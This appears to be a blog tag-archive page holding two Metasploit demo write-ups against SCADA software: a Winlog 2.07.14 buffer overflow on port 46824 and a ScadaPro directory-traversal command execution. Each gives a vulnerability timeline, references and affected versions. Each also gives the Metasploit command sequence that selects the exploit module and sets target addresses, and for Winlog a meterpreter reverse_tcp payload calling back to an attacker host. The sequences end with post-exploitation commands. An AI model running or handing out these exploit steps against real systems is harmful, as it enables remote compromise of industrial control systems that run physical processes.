Tag Archives: SCADA

Scada Sielco Sistemi Winlog Buffer Overflow 2.07.14 Metasploit Demo

Timeline :

Vulnerability discovered by m-1-k-3 the 2012-06-03
Public release of the vulnerability the 2012-06-04
Metasploit PoC provided the 2012-06-07

PoC provided by :

m-1-k-3

Reference(s) :

EBD-ID-18986
BID-53811

Affected version(s) :

Sielco Sistem Winlog before or equal to version 2.07.14

Tested on Windows XP Pro SP3 with :

Sielco Sistem Winlog 2.07.14

Description :

This module exploits a buffer overflow in Sielco Sistem Winlog before or equal to version 2.07.14. When sending a specially formatted packet to the Runtime.exe service on port 46824, an attacker may be able to execute arbitrary code.

Commands :

use exploit/windows/scada/winlog_runtime_2
set RHOST 192.168.178.22
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100

nmap -p 46824 192.168.178.22

exploit

getuid
sysinfo

EBD-ID-17848 : Measuresoft ScadaPro Remote Command Execution Metasploit Demo

Timeline :

Vulnerability discovered by Luigi Auriemma
Public release of the vulnerability the 2011-09-13
Metasploit PoC provided the 2011-09-16

PoC provided by :

Luigi Auriemma
mr_me
TecR0c

Reference(s) :

EDB-ID-17848

Affected version(s) :

All Measuresoft ScadaPro before version 4.0.1

Tested on Windows XP SP3 with :

Measuresoft ScadaPro 3.9.15.0 / 3.1.9

Description :

This module allows remote attackers to execute arbitray commands on the affected system by abusing via Directory Traversal attack when using the ‘xf’ command (execute function). An attacker can execute system() from msvcrt.dll to upload a backdoor and gain remote code execution.

Commands :

use exploit/windows/scada/scadapro_cmdexe
set RHOST 192.168.178.78
exploit

getuid
sysinfo